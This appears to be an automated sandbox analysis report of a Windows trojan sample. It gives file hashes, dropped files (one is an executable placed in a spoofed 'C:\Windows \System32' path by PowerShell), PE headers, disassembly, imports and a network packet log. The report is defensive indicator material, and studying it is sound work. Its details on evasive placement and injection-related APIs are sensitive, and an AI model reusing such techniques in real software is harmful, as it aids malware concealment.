                            Size (bytes):94168896
                            Entropy (8bit):7.999979498033118
                            Encrypted:true
                            SSDEEP:1572864:EiVVfuvJH7Y23ceID4BMS6YI8G9BXhJJklGSDvhbU0udwB1y6jqm2ze9yf5JdH:EWZ6bzR6HS6YI8G9DJJMZbU0uKryDvfR
                            MD5:6676B47DA47049E97EA06C7A83D1969A
                            SHA1:8F111371E4EAC87AD4EDC4B18A749D6CDA4D9F18
                            SHA-256:B16FA296FC4211D5443068181DC30C4F5A23B868752566DEE88FE57561BB1D14
                            SHA-512:25AE4B9D27B83DC9C1B440816B9FF8660A6B79442C668271C4646E1648E2FED2F51029AF55FA9A0C61239487E7BF6865A7FD8286EFA5FA62098A21744E2C9609
                            Malicious:true
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d... ..f.j..w%....& ...'.z......... ..........E.............................@......X.....`... .........................................^.... ..(................:...........`..............................`i..(...................|$...............................text....x.......z..................`..`.data...............................@....rdata..............................@..@.pdata...:.......<...d..............@..@.xdata..(4.......6..................@..@.bss....0................................edata..^..........................@..@.idata..(.... .....................@....CRT....`....@.....................@....tls.........P.....................@....reloc.......`.....................@..B/4...........p......................@..B/19....."G.......H..................@..B/31.....~...........>..............@..B/45.................H..............@..B/57.....

                            C:\Windows \System32\printui.exe

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):64000
                            Entropy (8bit):6.336447440888565
                            Encrypted:false
                            SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
                            MD5:2FC3530F3E05667F8240FC77F7486E7E
                            SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                            SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                            SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Joe Sandbox View:
                            • Filename: F.7z, Detection: malicious, Browse
                            • Filename: Ld0f3NDosJ.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                            Entropy (8bit):5.882732928679473
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe
                            File size:2'633'876 bytes
                            MD5:7ad7164ed33d36b88c59fad18b28c429
                            SHA1:40608e5e0b237e695df3b96050ac0e5594ed447e
                            SHA256:f543aa76f1e5aec622e01f4465d92a87b988039d5a29f5c526419ae075057287
                            SHA512:11b07db7ba55a4cd4f214ea54194a3c5f2840d66fa25de6dd7a399541d69839f4b18b3d258df9d9dc8965e859fd27d2687e8412e810ad1a1686269f82e3bdd06
                            SSDEEP:24576:TIjNMXOARQmdCsNnhDaEBm9FLPR5khMmd+Ec0xMki8UsU3AofYMXqopV8IK:8jNMXOARQmdC2taRl5O+YMXqopV8IK
                            TLSH:0CC5C74369DB0DEADED667B861C35335A774FD31CB291F2AAA08C23169536C4BD1EB00
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.P........&....'.......................@......................................(...`... ............................

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x1400013d0
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x66CFE2CB [Thu Aug 29 02:54:03 2024 UTC]
                            TLS Callbacks:0x4000c990, 0x1, 0x4000c960, 0x1, 0x40019550, 0x1
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:690fef90efcdfcf35381fef11a16eaae

                            Entrypoint Preview

                            Instruction
                            dec eax
                            sub esp, 28h
                            dec eax
                            mov eax, dword ptr [000C52F5h]
                            mov dword ptr [eax], 00000001h
                            call 00007F6DD480733Fh
                            nop
                            nop
                            dec eax
                            add esp, 28h
                            ret
                            nop dword ptr [eax]
                            dec eax
                            sub esp, 28h
                            dec eax
                            mov eax, dword ptr [000C52D5h]
                            mov dword ptr [eax], 00000000h
                            call 00007F6DD480731Fh
                            nop
                            nop
                            dec eax
                            add esp, 28h
                            ret
                            nop dword ptr [eax]
                            dec eax
                            sub esp, 28h
                            call 00007F6DD481CB4Ch
                            dec eax
                            cmp eax, 01h
                            sbb eax, eax
                            dec eax
                            add esp, 28h
                            ret
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            dec eax
                            lea ecx, dword ptr [00000009h]
                            jmp 00007F6DD4807579h
                            nop dword ptr [eax+00h]
                            ret
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            nop
                            push ebp
                            dec eax
                            mov ebp, esp
                            dec eax
                            sub esp, 10h
                            dec eax
                            mov dword ptr [ebp+10h], ecx
                            dec eax
                            mov dword ptr [ebp-08h], 00000000h
                            dec eax
                            mov eax, dword ptr [ebp+10h]
                            dec eax
                            imul eax, eax, FFFFD8F0h
                            dec eax
                            mov dword ptr [ebp-08h], eax
                            dec eax
                            mov eax, dword ptr [ebp-08h]
                            dec eax
                            add esp, 10h
                            pop ebp
                            ret
                            push ebp
                            dec eax
                            mov ebp, esp
                            dec eax
                            sub esp, 70h
                            dec eax
                            mov dword ptr [ebp+10h], ecx
                            dec eax
                            mov dword ptr [ebp+18h], edx
                            dec esp
                            mov dword ptr [ebp+20h], eax
                            dec eax
                            mov eax, dword ptr [ebp+10h]
                            dec eax
                            mov dword ptr [ebp+00h], eax

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xee0000x1834.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0xd00000xbe08.pdata
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf20000x167c.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0xc4e800x28.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xee6200x508.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xba8f80xbaa00ca1b597ffb4600012cc29b9afe13f8beFalse0.3628966426657736data6.140524043144982IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0xbc0000x35c00x36003de993d491761fec9f5800ebed145066False0.12803819444444445data1.5235878956623017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0xc00000xfb700xfc00ff4c39203caf39fb3990279176224c64False0.22735305059523808data4.791157937712967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .pdata0xd00000xbe080xc000c10b60e1f028860899f95b1bbbb20fe7False0.51275634765625data5.956729346834519IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .xdata0xdc0000x100040x102005cd4559b9fe08c048cd355fad61f168dFalse0.19348049903100775data4.894965559202991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .bss0xed0000xd200x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xee0000x18340x1a00e54b2bb147cce5306ab4ce05a19dfd73False0.29747596153846156data4.324614385250309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .CRT0xf00000x680x200ad3f846b593f534151399e74f4f7a1a7False0.076171875data0.36630310604047256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .tls0xf10000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .reloc0xf20000x167c0x1800c0a79cdd4c5b4203f59772aa9dab968aFalse0.3859049479166667data5.343003761068414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /40xf40000xb00x20049d3e359d4bae2318912c50f7cb37321False0.134765625data0.5872579451479871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /190xf50000x47220x4800a65b48456d1a28bd8c405b99249a7512False0.3797200520833333Matlab v4 mat-file (little endian) @\001, rows 134283269, columns 0, imaginary5.838384650148551IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /310xfa0000x87e0xa007f676e8d3905d34c432fdf4494fbc70bFalse0.323828125data4.467975227784129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /450xfb0000x98c0xa006c1c5a952656089d9851415c39c8a3beFalse0.54296875data4.794520617920899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /570xfc0000x4300x60024613193aa65a0e158afae85c913e953False0.3216145833333333data2.980098998991724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /700xfd0000xf80x200bfea4f8cc9509329887aa4b8825c773bFalse0.38671875data3.3832653486867974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /810xfe0000x5a10x600a65af867dde120f9b4429d6551c8882eFalse0.19596354166666666data4.899514248881176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /970xff0000x6e10x800d42fcc4c43adf363aac0e66b56b63ac5False0.45751953125data4.368693627810584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /1130x1000000x640x200bc0ecad1fa137342d2d979b5237a4c5eFalse0.1875Spectrum .TAP data "\005 " - BASIC program1.206131813612719IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Imports

                            DLLImport
                            KERNEL32.dllAddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FormatMessageA, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetHandleInformation, GetLastError, GetProcessAffinityMask, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount64, InitializeCriticalSection, IsDebuggerPresent, LeaveCriticalSection, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, RaiseException, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
                            api-ms-win-crt-convert-l1-1-0.dll_ultoa, mbrtowc, strtoul, wcrtomb
                            api-ms-win-crt-environment-l1-1-0.dll__p__environ, __p__wenviron, getenv
                            api-ms-win-crt-filesystem-l1-1-0.dll_fstat64
                            api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, calloc, free, malloc, realloc
                            api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_func, ___mb_cur_max_func, localeconv, setlocale
                            api-ms-win-crt-math-l1-1-0.dll__setusermatherr, _fdopen
                            api-ms-win-crt-private-l1-1-0.dll__C_specific_handler, __intrinsic_setjmpex, longjmp, memchr, memcmp, memcpy, memmove, strchr
                            api-ms-win-crt-runtime-l1-1-0.dll__p___argc, __p___argv, __p___wargv, _beginthreadex, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _endthreadex, _errno, _exit, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_app_type, _set_invalid_parameter_handler, abort, exit, signal, strerror
                            api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfprintf, __stdio_common_vfwprintf, __stdio_common_vsprintf, _fileno, _fseeki64, _ftelli64, _lseeki64, _read, _wfopen, _write, fclose, fflush, fopen, fputc, fputs, fread, fwrite, getc, getwc, putc, putwc, setvbuf, ungetc, ungetwc
                            api-ms-win-crt-string-l1-1-0.dll_strdup, iswctype, memset, strcmp, strcoll, strlen, strncmp, strxfrm, towlower, towupper, wcscmp, wcscoll, wcslen, wcsxfrm
                            api-ms-win-crt-time-l1-1-0.dll__daylight, __timezone, __tzname, _tzset, strftime, wcsftime
                            api-ms-win-crt-utility-l1-1-0.dllrand_s

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 3, 2024 08:30:30.291071892 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:30.291120052 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:30.291203976 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:30.304637909 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:30.304655075 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:30.791343927 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:30.791431904 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:30.793967962 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:30.793978930 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:30.794236898 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:30.803945065 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:30.848494053 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.356296062 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.408497095 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.445751905 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.445765018 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.445797920 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.445811033 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.445822001 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.445861101 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.445868015 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.445907116 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.445940018 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.446808100 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.446830988 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.446867943 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.446871996 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.446913004 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.446947098 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.448764086 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.448781013 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.448823929 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.448828936 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.448854923 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.448879004 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.534876108 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.534907103 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.535007000 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.535028934 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.535072088 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.535727978 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.535742044 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.535784006 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.535790920 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.535818100 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.535839081 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.537439108 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.537455082 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.537535906 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.537548065 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.537589073 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.538443089 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.538458109 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.538557053 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.538567066 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.538605928 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.622752905 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.622776985 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.622863054 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.622891903 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.622934103 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.623455048 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.623470068 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.623512983 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.623518944 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.623555899 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.624314070 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.624329090 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.624370098 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.624375105 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.624406099 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.624439955 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.625132084 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.625147104 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.625196934 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.625202894 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.625248909 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.626060009 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.626077890 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.626132011 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.626137972 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.626177073 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.626194954 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.626270056 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.626283884 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.626333952 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.626338959 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.626405001 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.627254963 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.627268076 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.627315044 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.627320051 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.627341986 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.627377987 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.628793001 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.710841894 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.710863113 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.710918903 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.710935116 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.710959911 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.710980892 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.711199045 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.711214066 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.711256027 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.711261988 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.711280107 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.711301088 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.711776018 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.711791039 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.711831093 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.711834908 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.711855888 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.711872101 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.712163925 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.712178946 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.712234974 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.712238073 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.712275028 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.714704037 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.714891911 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.716229916 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.716244936 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.716285944 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.716290951 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.716316938 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.716336012 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.716635942 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.716649055 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.716682911 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.716687918 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.716718912 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.716747046 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.717072010 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.717086077 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.717127085 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.717132092 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.717153072 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.717161894 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.717524052 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.717540026 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.717583895 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.717588902 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.717673063 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.724323988 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.799626112 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.799649000 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.799722910 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.799722910 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.799736977 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.799835920 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.801219940 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.801234007 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.801275969 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.801291943 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.801311016 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.801330090 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.801636934 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.801651955 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.801686049 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.801691055 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.801712036 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.801750898 CEST49727443192.168.2.5185.199.110.133
                            Sep 3, 2024 08:30:31.801929951 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.801950932 CEST44349727185.199.110.133192.168.2.5
                            Sep 3, 2024 08:30:31.801994085 CEST49727443192.168.2.5185.199.110.133
